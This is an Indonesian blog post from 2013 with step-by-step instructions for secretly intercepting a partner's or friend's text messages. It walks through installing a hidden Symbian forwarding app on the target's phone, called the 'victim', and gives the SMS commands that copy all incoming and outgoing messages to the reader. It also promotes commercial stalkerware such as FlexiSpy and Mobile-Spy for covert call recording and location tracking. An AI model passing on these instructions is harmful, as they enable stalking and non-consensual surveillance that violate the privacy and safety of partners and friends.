Minggu, 06 Januari 2013

Trik Menyadap SMS Handphone Pacar atau Teman.


Menurut catatan Asosiasi Telepon Seluler Indonesia (ATSI), saat ini, sekitar 180 juta penduduk Indonesia sudah menjadi pelanggan layanan seluler. Itu berarti, sudah sekitar 60 persen populasi di tanah air sudah memiliki perangkat telekomunikasi.

Nah kali ini saya akan coba share tentang cara menyadap SMS di handphone pacar yang sering selingkuh biar ketahuan belangnya. Untuk penyadapan dengan alat lacak, atau penyadapan dengan fitur lebih lengkap untuk investigasi professional anda dapat mengunjungi link berikut : 


atau 



Tetapi aku hanya akan menjelaskan kepada kalian cara menyadap sms khusus Nokia Symbian. Jangan memakainya dengan maksud jahat karena perbuatan dosa kalian akan sangat besar.

Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. 


Ikuti instruksi berikut ini untuk menyadap handphone :
  1. Download smsanywherelite.sis, download di link http://www.statmyweb.com/s/smsanywherelite.sis
  2. Instal aplikasi itu di HP kalian dan teman kalian
  3. Begitu aplikasi ini diinstal, kalian tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya. Jika digunakan sebagai alat sadap. Berarti sang target kan jangan sampai mengetahui kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman kalian tidak akan tahu kan kalo smsnya disadap? Karena aplikasi ini belum mendukung GUI (Graphics User Interface).
  4. Siapkan ponsel korban kalian
  5. Siapkan HP kamu yang akan menerima sms masuk dari korban.
  6. Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms SA (spasi) (password) (spasi) ON. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456,ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ ponsel kalian. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
  7. Lalu, jika kalian ingin menyadap lebih dari 5 hari atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms : SA (spasi) (password)(spasi) R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter dibelakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kalian. Untuk mematikan fungsi ini dengan mengirim SMS SA 1234567 S0
  8. Sekarang, setiap korban menerima dan mengirim sms, kalian akan mendapat terusannya sama persis dengan sms aslinya.


Selain cara di atas, jika anda punya "cukup modal" ada  cara agar anda dapat menyadap ponsel orang tanpa diketahui dengan fitur lebih komplet, baik saat orang tersebut sedang menelpon atau sms, gunakan software ini :

  • FlexiSpy

Aplikasi ini dapat memantau semua aktivitas ponsel target. Mulai dari data SMS hingga percakapan telepon. Informasinya dikirim melalu kanal GPRS ke server FlexiSpy dan bisa dipantau tanpa diketahui sang pemilik ponsel.

Yang terbaru, anda bisa secara otomatis merekam hasil intai FlexiSpy ke PC pribadi lewat aplikasi Flexi Record. Format rekamannya dalam bentuk MP3. Harga aplikasi ini adalah 150 EUR dan bisa didapatkan dari http://www.flexispy.com

  • VoxTrack Personal
Aplikasi garapan Psiloc ini merupakan upgrade terbaru dari Xelnex Lite. Fungsinya untuk merekam percakapan telepon (masuk atau keluar) tanpa harus menekan tombol khusus. Proses pengaktifan rekamannya pun terbilang rahasia, karena tidak disertai dengan buni 'beep'. Jadi, cocok untuk memata-matai orang. VoxTrack Personal bisa dihadapkan dari http://shop.psiloc.com, harganya 14.95 EUR.

  • Mobile-Spy
Layanan utama yang ditawarkan aplikasi ini adalah memonitor aktivitas pengguna fitur ponsel, semisal SMS dan telepon secara diam-diam. Selain itu, ponsel ber-GPS pun bisa didata lokasi mana saja yang pernah disinggahi. Bahkan histori browsing internet pun bisa direkam secara lengkap oleh Mobile-Spy. Anda bisa berlangganan aplikasi berbasis layanan ini deengan mendaftar di http://www.mobile-spy.com. harga untuk 3 bulan 49, 97 US Dolar.

  • SMS Anywhere
SMS Anywhere bekerja dengan meneruskan SMS (forward) semua SMS yang dikirim dan diterima ponsel target dan bekerja tanpa sepengetahuan pemilik ponsel. Karena aplikasi ini tidak menggunakan user interface sehingga tidak akan terlihat di layar ponsel target. Untuk Informasi anda mengunjungi situsnya di : www.wireless-labs.com/, harga  49 US Dolar.

Aplikasi SMS Anywhere sebenarnya diperuntungkan bagi orang yang memiliki beberapa ponsel dan menginginkan semua pesannya bisa dibaca diponsel lainnya. Jalan yang paling mudah adalah dengan melakukan forwarding ke nomor yang diinginkan. Nah, SMS Anywhere ini bisa melakukannya secara otomatis.  Karena aplikasinya tersembunyi layanan ini bisa dimanfaatkan untuk melirik SMS orang lain.

Dengan begini, kita akan tahu apakah pacar kita selingkuh, atau apakah teman kita berkhianat dan lainnya (tentunya dengaan modal juga .... he..he... )

Sumber : (dengan penambahan)
  1. http://sciencemythologi.blogspot.com/
  2. http://fahranlog.blogspot.com/